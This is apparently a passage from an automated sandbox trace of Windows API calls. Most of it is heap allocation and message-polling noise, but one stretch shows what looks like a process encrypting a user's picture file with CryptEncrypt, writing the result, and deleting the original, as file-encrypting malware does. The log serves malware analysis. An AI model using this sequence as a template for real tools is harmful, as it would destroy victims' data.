dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0091.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0091.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0091.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0091.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0091.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0091.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0091.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0091.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0091.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0091.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0091.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0091.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0091.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0091.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0091.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0091.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0091.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0091.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0091.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0091.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0091.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0091.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0091.271] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0091.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0091.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0091.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0091.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0091.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0091.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0091.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0091.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0091.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0091.272] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0091.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0091.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0091.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0091.272] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0091.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0091.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0091.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0091.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0091.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0091.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0091.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0091.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0091.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0091.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2c08 | out: hHeap=0x1780000) returned 1 [0091.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0091.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0091.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0091.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0091.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0091.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0091.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0091.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0091.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0091.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0091.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0091.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0091.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0091.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0091.273] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0091.273] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0091.273] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0091.316] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0091.316] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0091.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0091.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca778, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0091.317] CryptEncrypt (in: hKey=0x41ac000, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0xfa89, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0xfa90) returned 1 [0091.317] CharLowerBuffW (in: lpsz="byte[64145]", cchLength=0xb | out: lpsz="byte[64145]") returned 0xb [0091.317] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0091.317] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0091.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0091.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca898, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0091.317] CryptEncrypt (in: hKey=0x41ac000, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x499a008*, pdwDataLen=0x144e790*=0xfa89, dwBufLen=0xfa90 | out: pbData=0x499a008*, pdwDataLen=0x144e790*=0xfa90) returned 1 [0091.317] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0091.318] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0091.318] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0091.318] WriteFile (in: hFile=0x298, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0xfa90, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144f194*=0xfa90, lpOverlapped=0x0) returned 1 [0091.320] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0091.320] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0091.321] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0091.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0091.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca268, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0091.321] CryptDestroyKey (hKey=0x41ac000) returned 1 [0091.321] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0091.321] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0091.321] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0091.321] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0091.321] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0091.321] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0091.321] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0091.321] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0091.321] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0091.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0091.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796d68, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0091.321] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0091.322] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0091.322] FreeLibrary (hLibModule=0x756e0000) returned 1 [0091.322] CloseHandle (hObject=0x258) returned 1 [0091.322] CloseHandle (hObject=0x298) returned 1 [0091.325] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\YwIpia.gif", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\YwIpia.gif", lpFilePart=0x0) returned 0x23 [0091.325] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\YwIpia.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\ywipia.gif")) returned 0x20 [0091.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0091.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2190 [0091.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0091.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0091.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0091.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0091.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0091.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0091.325] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\YwIpia.gif", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77c7a780, ftCreationTime.dwHighDateTime=0x1d5ed1f, ftLastAccessTime.dwLowDateTime=0xa20a2780, ftLastAccessTime.dwHighDateTime=0x1d5eb16, ftLastWriteTime.dwLowDateTime=0xa20a2780, ftLastWriteTime.dwHighDateTime=0x1d5eb16, nFileSizeHigh=0x0, nFileSizeLow=0xfa89, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="YwIpia.gif", cAlternateFileName="")) returned 0x41ac600 [0091.325] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\YwIpia.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\ywipia.gif")) returned 1 [0091.381] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77c7a780, ftCreationTime.dwHighDateTime=0x1d5ed1f, ftLastAccessTime.dwLowDateTime=0xa20a2780, ftLastAccessTime.dwHighDateTime=0x1d5eb16, ftLastWriteTime.dwLowDateTime=0xa20a2780, ftLastWriteTime.dwHighDateTime=0x1d5eb16, nFileSizeHigh=0x0, nFileSizeLow=0xfa89, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="YwIpia.gif", cAlternateFileName="")) returned 0 [0091.381] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0091.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0091.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0091.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0091.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0091.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a3a0 | out: hHeap=0x1780000) returned 1 [0091.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0091.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0091.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0091.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0091.382] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0091.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0091.382] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0091.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0091.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0091.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9908 | out: hHeap=0x1780000) returned 1 [0091.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0091.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0091.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf798 | out: hHeap=0x1780000) returned 1 [0091.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0091.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0091.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0091.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050e78 | out: hHeap=0x1780000) returned 1 [0091.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0091.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b60 | out: hHeap=0x1780000) returned 1 [0091.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0091.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf770 | out: hHeap=0x1780000) returned 1 [0091.383] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0091.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0091.383] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0091.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0091.383] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0091.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0091.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0091.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e70 [0091.383] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0091.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e70 | out: hHeap=0x1780000) returned 1 [0091.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0091.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0091.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2270 [0091.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0091.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b60 [0091.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2280 [0091.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0091.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0091.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2200 [0091.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0091.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22f0 [0091.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9908 [0091.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0091.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2140 [0091.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0091.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2290 [0091.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0091.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9c50 [0091.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0091.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0091.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21a0 [0091.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0091.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf798 [0091.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0091.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0091.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0091.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0091.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0091.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0091.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0091.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0091.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0091.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0091.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0091.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2280 [0091.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0091.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0091.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0091.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0091.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0091.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0091.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0091.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0091.385] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0091.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0091.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0091.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0091.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0091.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0091.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0091.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0091.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0091.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, 